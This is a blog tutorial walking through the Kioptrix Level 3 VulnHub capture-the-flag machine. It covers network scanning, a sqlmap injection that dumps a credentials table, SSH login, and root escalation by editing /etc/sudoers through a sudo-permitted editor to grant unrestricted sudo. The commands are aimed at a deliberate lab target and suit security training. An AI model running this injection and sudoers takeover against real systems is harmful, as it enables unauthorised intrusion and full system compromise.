Kioptrix level 3

KIOPTRIX: LEVEL 3 [Vulnhub] | Full Tutorial | Updated [2024]

By /

Introduction

In this post, You will learn how to CTF the Kioptrix level 3, and I am sure by the end of the post, You will be able to capture the flag.

If you have any doubt, or you got any errors, comment down below ????????. I will help you out.

To download Kioptrix level 3 [Click here]

Kioptrix level 3 Walkthrough

Finding target IP (ARPSCAN, Netdiscover)
Nmap scan
Enumerating
Sql Injection
Accessing target
Privilege escalation

Finding target IP

To find the target IP just enter arp-scan -l in root, or you can go with the nediscover commend

arp-scan -l

Nmap scan

Instead of nmap you can use the masscan also. So, We have found the target IP and my target IP is 192.168.1.42, and I am going to do an OS & Service scan to do so… Enter the below command.

nmap -A <Target IP>

nmap -A 192.168.1.42

Enumerating

Now, let’s enter the target IP in browser and see what are we getting

We can see an option called see it now, and I am going to click on the now

After a lot of enumeration, I have found that this URL is prone to SQL attack

http://192.168.1.42/gallery/gallery.php?id=1

SQLMAP

Enter the below command to do the SQL injection and Instead of the IP enter your target IP

sqlmap -u 192.168.1.42/gallery/gallery.php?id=1 -D gallery –tables dev_accounts –dump

After some enumeration using sqlmap I have found the database gallery and I started to enumerate that, and then I have found the table’s dev_accounts and then finally I have done the brute force using the –dump command.

Connecting to target

We are going to connect to the target using the ssh

ssh loneferret@192.168.1.42

Privilege escalation

sudo ls

sudo ht /etc/sudoers

export TERM=xterm-color

sudo ht /etc/sudoers

Once you enter the above commands you will be seeing the HT editor, Press Fn + F3

Press Fn+F3 and enter /etc/sudoers

Once you have entered the /etc/sudoers press enter

You will be seeing this line

loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht

Change this line to

loneferret ALL=(ALL) NOPASSWD: ALL

Press Alt + F and save the file and then do

sudo su

cd /root

ls

Conclusion

Fu** finally we have captured the flag, and it was really very funny working in kioptrix level 3 and share this post with your friend in need…

Have any doubts, comment down below.

Also Read: Kioptrix level 1 Walkthrough

Related Posts

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site

 

Scroll to Top